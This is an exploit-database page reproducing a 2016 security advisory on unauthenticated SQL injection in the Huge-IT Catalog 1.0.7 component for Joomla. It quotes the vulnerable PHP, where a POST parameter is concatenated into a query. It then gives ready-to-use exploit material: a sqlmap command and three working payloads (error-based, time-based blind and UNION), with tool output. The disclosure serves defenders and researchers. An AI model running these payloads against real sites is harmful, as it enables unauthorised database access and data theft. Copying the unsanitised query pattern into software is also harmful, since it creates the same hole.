Skip to content
cyberexploits
webappphptext

Joomla! Component Catalog 1.0.7 - SQL Injection

Joomla! Component Catalog 1.0.7 - SQL Injection

Published on 2016-09-16

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/40851.txt7eac4c3a
raw
Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla

Author: Larry W. Cashdollar, @_larry0

Date: 2016-09-16

Download Site: http://huge-it.com/joomla-catalog/

Vendor: huge-it.com

Vendor Notified: 2016-09-17

Vendor Contact: info@huge-it.com

Description: 

Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a 

variety of catalogs with a specific product category. To imagine is not difficult, to use is even easier.



Vulnerability:

The following code does not prevent an unauthenticated user from injecting SQL into functions via 'load_more_elements_into_catalog' located in ajax_url.php. 



Vulnerable Code in : ajax_url.php



 11 define('_JEXEC', 1);

 12 defined('_JEXEC') or die('Restircted access');

.

.

.

308         } elseif ($_POST["post"] == "load_more_elements_into_catalog") {

309             $catalog_id = $_POST["catalog_id"];

310             $old_count = $_POST["old_count"];

311             $count_into_page = $_POST["count_into_page"];

312             $show_thumbs = $_POST["show_thumbs"];

313             $show_description = $_POST["show_description"];

314             $show_linkbutton = $_POST["show_linkbutton"];

315             $parmalink = $_POST["parmalink"];

316             $level = $_POST['level'];

.

.

.

359             $query->select('*');

360             $query->from('#__huge_it_catalog_products');

361             $query->where('catalog_id =' . $catalog_id);

362             $query->order('ordering asc');

363             $db->setQuery($query, $from, $count_into_page);



CVE-ID: CVE-2016-1000125

Export: JSON TEXT XML

Exploit Code:

	• $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*"  --level=5 --risk=3


	• Parameter: #1* ((custom) POST)

	•     Type: error-based

	•     Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)

	•     Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=


	•     Type: AND/OR time-based blind

	•     Title: MySQL >= 5.0.12 time-based blind - Parameter replace

	•     Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=


	•     Type: UNION query

	•     Title: Generic UNION query (random number) - 15 columns

	•     Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=

	• ---

	• [16:48:10] [INFO] the back-end DBMS is MySQL

	• web server operating system: Linux Debian 8.0 (jessie)

	• web application technology: Apache 2.4.10

	• back-end DBMS: MySQL >= 5.0.12

	• [16:48:10] [WARNING] HTTP error codes detected during run:

	• 500 (Internal Server Error) - 6637 times

	• [16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'


	• [*] shutting down at 16:48:10




Advisory: http://www.vapidlabs.com/advisory.php?v=171



View on GitHub